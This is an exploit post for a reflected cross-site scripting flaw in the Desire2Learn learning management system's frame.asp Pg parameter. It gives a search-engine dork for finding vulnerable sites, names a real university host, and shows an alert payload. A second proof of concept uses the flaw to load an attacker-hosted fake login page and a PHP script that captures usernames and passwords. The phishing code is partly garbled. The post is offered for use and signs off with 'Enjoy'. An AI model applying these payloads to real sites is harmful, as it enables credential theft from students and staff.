# Exploit Title: Desire2Learn LMS XSS # Google Dork: allintext:Powered by Desire2Learn # Date: 4/22/16 # Exploit Author: @CrazedSec # Vendor Homepage: http://www.d2l.com/ # Tested on: Firefox on Mac 10.8.5 Description: Desire2Learn has a reflected xss vulnerability in the Pg parameter within frame.asp. PoC #1: 1. Google allintext:Powered by Desire2Learn and find a site with the LMS. (example: learn.colorado.edu) 2. Add /frame.asp?Pg=javascript:alert('xss by @grumpysec') PoC #2 Host 2 files on a site #========= phish.html =========#

Please login to continue!

Username :

Password :



#========= phish.php =========# ' . ' Password : ' . $password . '
' . '
'); ?> learn.colorado.edu/frame.asp?Pg=http://yourphishingsite.com/phish.html Enjoy -@CrazedSec # siph0n [2016-05-12]